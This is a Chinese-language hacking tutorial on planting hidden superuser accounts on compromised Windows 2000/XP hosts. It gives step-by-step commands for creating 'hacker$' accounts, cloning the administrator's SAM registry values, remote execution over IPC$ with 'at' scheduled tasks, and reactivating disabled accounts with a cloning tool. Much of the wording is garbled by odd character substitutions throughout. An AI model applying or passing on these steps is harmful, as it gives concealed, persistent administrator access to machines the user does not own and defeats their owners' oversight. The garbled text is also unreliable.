创建隐藏的超级用户

创建隐藏的超级用户

1、如何在图形界面创建隐藏的超级用户 　　图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位做者说的方法很好，可是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序），若是在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。由于windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想你们都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优势就是可以对注册表的项键设置权限。nt/2000/xp的账户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下，可是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，所以我首先用regedt32.exe对SAM键为我设置为“彻底控制”权限。这样就能够对SAM键内的信息进行读写了了。具体步聚以下： 　　一、假设咱们是以超级用户administrator登陆到开有终端服务的肉鸡上的，首先在命令行下或账户管理器中创建一个账户:hacker$,这里我在命令行下创建这个账户 　　net user hacker$ 1234 /add 　　二、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。 　　三、点“权限”之后会弹出窗口 　　点添加将我登陆时的账户添加到安全栏内，这里我是以administrator的身份登陆的，因此我就将administrator加入，并设置权限为“彻底控制"。这里须要说明一下:最好是添加你登陆的账户或账户所在的组，切莫修改原有的账户或组，不然将会带来一系列没必要要的问题。等隐藏超级用户建好以，再来这里将你添加的账户删除便可。 　　四、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 　　打开键：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$" 　　五、将项hacker$、0000040九、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,而后再将00000409.reg与hacker.reg合并。 　　六、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del 　　七、在regedit.exe的窗口内按F5刷新，而后打文件-导入注册表文件将修改好的hacker.reg导入注册表便可 　　八、到此，隐藏的超级用户hacker$已经建好了，而后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的账户administrator便可）。 　　九、注意：隐藏的超级用户建好后，在账户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，可是超级用户创建之后，就不能再改密码了，若是用net user命令来改hacker$的密码的话，那么在账户管理器中将又会看这个隐藏的超级用户了，并且不能删除。 2、如何在命令行下远程创建隐藏的超级用户 　　在这里将用at的命令，由于用at产生的计划任务是以系统身份运行的，因此也用不到psu.exe程序。为了可以使用at命令，肉鸡必须开有schedule的服务，若是没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，固然其方法也能够，只要能启动schedule服务就行。 　　对于命令行方式，你能够采用各类链接方式，如用SQLexec链接MSSQL的1433端口，也能够用telnet服务，只要以你能获得一个cmdshell，而且有运行at命令的权限就能够。 　　一、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，如今咱们开始在命令行下远程为它创建隐藏的超级用户。（例子中的主机是个人局域网内的一台主机，我将它的ip地址改成13.50.97.238,，请勿在互联网上对号入座,以避免骚扰正常的ip地址。） 　　二、先与肉鸡创建链接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator 　　三、用at命令在肉鸡上创建一个用户(若是at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51 　　c:\winnt\system32\net.exe user hacker$ 1234 /add 　　创建这个加有$符的用户名，是由于加有$符后，命令行下用net user将不显示这个用户，但在账户管理器却能看到这个用户。 　　四、一样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值：at \\13.50.97.238 12:55 　　c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\ 　　/e 是regedit.exe的参数，在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的必定要以\结尾。必要的状况下能够用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引发来。 　　五、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\13.50.97.238\admin$\system32\hacker.reg 　　c:\hacker.reg 　　修改的方法图形界中已经介绍过了，这里就不做介绍了。 　　六、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg 　　七、查看肉鸡时间：net time \\13.50.97.238 而后用at命令将用户hacker$删除: 　　at \\13.50.97.238 13:40 net user hacker$ /del 　　八、验证hacker$是否删除:用 　　net use \\13.50.97.238 /del 断开与肉鸡的链接。 　　net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用账户hacker$与肉鸡链接，不能链接说明已删除。 　　九、再与肉鸡创建链接：net use \\13.50.97.238\ipc$ "12345678" /user:"administrator" 　　再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表: 　　at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg 　　regedit.exe的参数/s是指安静模式。 　　十、再验证hacker$是否已创建，方法同上面验证hacker$是否被删除同样。 　　十一、再验证用户hacker$是否有读、写、删的权限，若是不放心，你还可验证是否能创建其它账户。 　　十二、经过11能够判定用户hacker$具备超级用户权限，由于最初我用at命令创建它的时候是一个普通用户，而如今却具备远程读、写、删的权限。 　　3、若是肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？ 　　这种状况下，你也能够用界面方式来远程为肉鸡创建隐藏的超级用户。由于regedit.exe、regedt32.exe都有链接网络注册表的功能，你能够用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。账户管理器也有一项连另外一台计算机的功能，你能够用账户管理器为远程主机创建和删除账户。具体步聚与上面介绍的类似，我就很少说了，只它的速度实在是使人难以忍受。 　　可是这里有两个前提：一、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机创建链接之后，才能用regedit.exe regedt32.exe及账户管理器与远程主机链接。 　　二、远程主机必须开启远程注册表服务（没有开启的话，你也能够远程开启，由于你有超级用户的密码了）。 　　4、利用被禁用的账户创建隐藏的超级用户： 　　咱们能够用肉鸡上被禁止的用户来创建隐藏的超组用户.方法以下: 　　1．想办法查看有哪些用户被细心的管理员禁止，通常状况下，有些管理员出于安全考虑，一般会将guest禁用，固然了会禁用其它用户。在图形界面下，很是容易，只要在账户管理器中就能够看到被禁用的账户上有一个红叉；而在命令行下，我尚未想到好的办法，只能在命令行下用命令："net user 用户名"一个一个来查看用户是否被禁用。 　　2．在这里，咱们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆以后，被禁用的用户hacker就会自动被激活了）: CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。 　　3．若是你如今一个cmdshell，如利用telnet服务或SQLEXEC链接肉鸡的msSQL的默认端口1433获得的shell均可以，这时你只要输入命令： 　　net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），固然你也能够将用户hacher换成其它的被禁用的用户。 　　4．这时若是你在图形界面下看账户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户链接一下肉鸡看看是否能连上？用命令：net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我能够告诉你们，通过我屡次试验，次次都能成功，并且仍是超级用户权限。 　　5．若是没有cmdshell怎么办？你能够我上面介绍的at命令来禁用用户hacker;命令格式：at \\肉鸡ip 时间 net user hacker /active:no 　　6．原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在账户管理器中禁用一下超级用户administrator看看，确定会弹出一对话框，并禁止你继续禁用超级用户administrator，一样，由于在克隆时，hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代，于是hacker就具备了超级用户的权限了，可是因为hacker在注册表内"C"健仍是原来的"C"键，因此hacker仍是会被禁用，可是它的超级用户权限却不会被禁用，所以被禁用的用户hacker仍是能够链接肉鸡，并且还具备超级用户的权限。具体我也说不明白，你们权且这么理解吧。 　　5、注意的几点事项： 　　一、隐藏的超级用户创建之后，在账户管理器中和命令行下均看不到这个用户，但这个用户却存在。 　　二、隐藏的超级用户创建之后，就不能再修改密码了，由于一旦修改密码，这个隐藏的超级用户就会暴露在账户管理器中，并且不能删除。 　　三、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，由于本人作试验时，曾出现过账户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸亏我有备份,呵呵。SAM键是毕竟系统最敏感的部位。 　　四、本方法在2000/XP上测试经过，未在NT上测试。本方法仅供研究，请勿将本方法用于破坏上，利用本方法形成严重后果者，由使用者负责，本人概不负责。